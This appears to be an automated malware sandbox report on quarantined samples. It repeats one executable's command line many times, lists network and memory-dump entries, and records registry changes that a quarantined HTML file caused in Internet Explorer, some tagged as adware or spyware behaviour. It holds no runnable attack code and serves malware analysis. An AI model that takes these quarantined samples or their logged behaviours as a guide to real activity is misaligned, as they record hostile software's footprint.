"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1232-0-0x0000000074BBE000-0x0000000074BBF000-memory.dmp

memory/1232-1-0x0000000000E80000-0x0000000000FF0000-memory.dmp

memory/1232-2-0x0000000005EF0000-0x0000000006494000-memory.dmp

memory/1232-4-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/1232-5-0x0000000074BBE000-0x0000000074BBF000-memory.dmp

memory/1232-6-0x0000000074BB0000-0x0000000075360000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

147s

Max time network

129s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b7b733f7c253b4c826af622749b40c000000000020000000000106600000001000020000000a78f6e4e79be73bda68dc7a0bbbcab2ae9696091a31f40e6d3ec48b844ad70d3000000000e80000000020000200000009358b463a3da7decaa0a7a2fbfe5d5ab6bd2471ee8b6c62a004a45b25ca8228920000000c82b6691e211b6a4b915da5ae8e8e60eb23ec28b6ebb40da7becf503f6b9d2cb4000000095b867fe2143d00788da289e874e39bd640ff0ead930e7b83f57f73352a35d6cadd15e8ff45f29adfeceac3c8ec41a3aefc34c450be7f820a53ba63cf5c7d85e C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A542C1-F499-11EF-8250-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774343" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
